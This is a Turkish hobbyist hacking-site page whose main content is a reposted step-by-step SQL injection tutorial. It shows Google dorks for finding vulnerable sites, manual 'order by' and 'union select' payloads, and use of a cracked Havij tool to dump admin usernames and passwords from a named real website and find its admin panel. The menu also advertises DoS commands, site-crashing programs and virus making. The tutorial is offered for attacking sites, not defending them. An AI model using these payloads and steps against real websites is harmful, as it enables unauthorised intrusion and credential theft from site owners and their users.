MISIRA SELAM OLSUN...
 
Kalitenin Sitesine Hoşgeldiniz !
Sayfalar  
  Ana Sayfa
  Link listesi
  İletişim
  Forum
  Ziyaretci Defteri
  Anketler
  3D Oyunlar
  Admin Girisi
  Eglence
  Sms Gönder !
  Ask Olcer :D
  Oyun Indir !!
  Escapa Oyna !
  Cs Videolari
  Pembe Panter Izle
  Nizama Adanmis Ruhlar
  Kodlar
  Sitene 3D Oyunlar Ekle
  Sitenize Haber Kodlari
  Sitenize Hesap Makinesi Kodu
  Bayrak Kodlari
  Sitene Saat Kodlari
  Sitenize Destek
  Siteye Video Eklemek
  Siteye Kod Nasil Eklenir ?
  Bilgisayar Destek
  Vb6 Dersler
  Xp Bilgisayara Format Atma
  Site Cokertme Programi
  Diger
  Mehter Marsi
  Sozluk
  Guvenlik Icin Program
  Reklam Ver !
  Msn Destek
  Dost Site!
  10 Numara Virus Programi
  Zararsiz Virus Yapimi
  En iyi 3 Video Cekme Programi
  Shell Nedir ? Nasil Atilir
  Iconlar
  Kuran-I Kerim
  Ucretsiz Web Sitesi Kur
  Türklük
  Türkiye Cumhuriyeti Cumhurbaşkanları !
  Türkler Neden Bozkurt'u Sembol Olarak Seçmiştir ?
  Filmler
  Nefes Izle
  Sümela'nın Şifresi İzle
  Site Hack !
  Wordpress Dorkları !
  Joomla Dorkları !
  Dork Yazar v1
  Dork Yazar v2 [Kendi Yapımım Program]
  Sql İnjection Geniş Anlatım
  Tüm Yönleriyle Joomla Ve Açıkları !
  Eksen Atack İle Joomla Hack !
  Botnet Nedir ?
  Hızlı Eksen Atack Kullanımı !
  Dos Saldırı Komutları
  İlahiler !
  Ay Doğdu Üzerimize Dinle !
  Allahu Allah Dinle
  Allah'ın İpine Sarılmak Lazım | Nizama Adanmış Ruhlar - 56. Bölüm
© Copyright ByFatalWarrior (2012) 		 
Sql İnjection Geniş Anlatım
Anlatım Turk Hack Team'dan Dark Desert 'e aittir.
Selamun Aleyküm Kardeşlerim...şimdi sizlere SQL nedir? SQL injection nedir? nasıl kullanılır? manuel ve programlı anlatım birlikte adım adım anlatacagım.


SQL Nedir ?


# SQL (Structured Query Language) veritabanından bilgi çekme silme vb. gibi işlemler yapabilen bir dildir. Bulunduğumuz zamanda çoğu web sitelerinin alt yapılarında bu veritabanı vardır. 
# SQL en yaygın olan güvenlik açığıdır ve çok tehlikelidir. 
# SQL hazır scriptler (vbulletin,vb.) gibi yüksek güvenlik testlerinden geçirilmez. 
# Bu web siteleri vertibanı ile anlaşmaları için SQL’e ihtiyaç duyarlar.

SQL İnjection Nedir?


# SQL İnjection bir SQL açıklı siteye uygulanan İnjection türüdür.

SQL İnjection Olan Sayfayı Nasıl Bulabilirim ?


# SQL açığı olan bir sayfa bulabilmemiz için bize bir dork lazım bu dorku THT forumdan ya da Google amcadan bulabiliriz. Örnek bir Dork: inurl:galery.php?id= inurl:index.php?id=.


SQL İnjection’u Hangi Sayfalarada Kullanabilirim ? 


# SQL İnjection’u kullanabilmamiz için sayfa url’sinde bize

id=değer", "search=değer" gibi değişken değerleri alabilen ifadeler lazımdır. 


SQL İnjection’u Nasıl Kullanabilirim ? 


# Evet Google’dan dorkumuzu arattık sayfalar çıktı başlıyoruz sayfaları gezmeye gezdiğimiz sayfalarda

# URL’nin sonunda php?id=45 veya daha farklı bir sayı yazar bu sayıların sonuna tırnak işareti (’) koyuyoruz.

# Örnek: www.örneksite.com/php?id=120 site bu sitede id değerimiz gördüğünüz gibi 220 id değerinin sonuna ’ işaretimizi koyuyoruz ve Enter’lıyoruz.

www.örneksite.com/php?id=120' 

Sitede bir hata verirse :

Warning: include(../inc/content220\\\\’.inc.php) [function.include]: failed to open stream: No such file or directory in /homepages/6/d27097856/htdocs/www.fanatec.de/html/index.php on line 162

Warning: include() [function.include]: Failed opening ’../inc/content220\\\\’.inc.php’ for inclusion (include_path=’.:/usr/lib/php5’) in /homepages/6/d27097856/htdocs/www.fanatec.de/html/index.php on line 162

Bunun gibi bir hata alırsak sitede bir SQL açığı vardır. 


SQL Açığını Nasıl Kullanabiliriz ? 


# SQL açığını bulduktan sonra sıra geldi İnjection yapamaya İnjection’u 2 türlü yapabiliriz. 


1. Havij ve benzeri programlar ile

2. Manuel olarak

Manuel SQl inj Havijin yaptığı elle yapılanıdır. 


Manuel olarak SQL İnjection Nasıl Yapılır ? 


# Evet sitemizde kolon sayısını bulacağız bunun için ordey+by+ veya group+by+ komutunu kullanacağız

www.örneksite.com/php?id=120+order+by+100 bu yüz sayısını misal veriyorum.

Bu sayıyı gittikçe azaltıcağız.Taa ki hatamız gidene kadar.

www.örneksite.com/php?id=120+order+by+95

www.örneksite.com/php?id=120+order+by+40

www.örneksite.com/php?id=120+order+by+7 

evet diyelimki 7 de hatamız gitti yani kolon sayımız 7’dir.

Şimdi Kolonları ekrana yansıtmaya geldi sır****olon sayımız 7’idi.

Bunun için union+select+... kodumuzu kullanacağız.


www.örneksite.com/php?id=120+union+select+0,1,2,3,4,5,6

yazıyoruz.Kolon sayımız 7 olduğu için 7’ye kadar yazıyoruz.

Evet diyelimki 1 ve 5 kolonları yansıdı ekrana.

Not: Unutmadan bir not’da geçelim eğer kolonlar ekrana yansımaz ise URL’mizin sonuna -- ifadesini eklemeliyiz.





Sonraki Aşama Database’den tabloları almaya ama bunu bir sonraki dersimde anlatacağım. 
sonraki ders için daha ayrıntılı manuel anlatımı için tıkla


Havij Yolu ile SQL İnjection Nasıl Yapılır ? 
indirmek için link : Hotfile.com: One click file hosting: Havij 1.15 Pro + Loader V1.1.rar


# Evet SQL açıklı sitemizi bulduk. >>>Fanatec.com sitemiz buydu bu şekilde Havij’e yapıştırıyoruz. 

Analyze diyoruz Analyze ettikden sonra Tables diyoruz 

This image has been resized.Click to view original image


Tables dedikten sonra Get Tables diyi kolonları çekiyoruz.

Çektikten sonra admin_pass’ı seçip Get Columns diyoruz 

This image has been resized.Click to view original image


Admin_pass ı açtıktan sonra username ve password seçeneğine tıklayıp Get data diyoruz ve username şifre elimizde 

This image has been resized.Click to view original image


Admin panelini bulmak istiyorsak Find Admin’e tıklayıp URL’mizi yapıştırdıktan sonra Start diyoruz ve Admin paneli elimizde.png 

This image has been resized.Click to view original image




 
Admin Girişi !  
 
Kullanıcı adı:
Şifre:
 
Saat  
   
Hava Durumu  
 
Sitene Hava Durumu Ekle		  
Dost Siteler !  
  Siteni Ekle Siteni Ekle Siteni Ekle Siteni Ekle  
Bugün 29981 ziyaretçi sitemizi ziyaret etti.
Resme Tıkla Ve Reklam Ver ! MISIRA SELAM OLSUN...
Bu web sitesi ücretsiz olarak Bedava-Sitem.com ile oluşturulmuştur. Siz de kendi web sitenizi kurmak ister misiniz?
Ücretsiz kaydol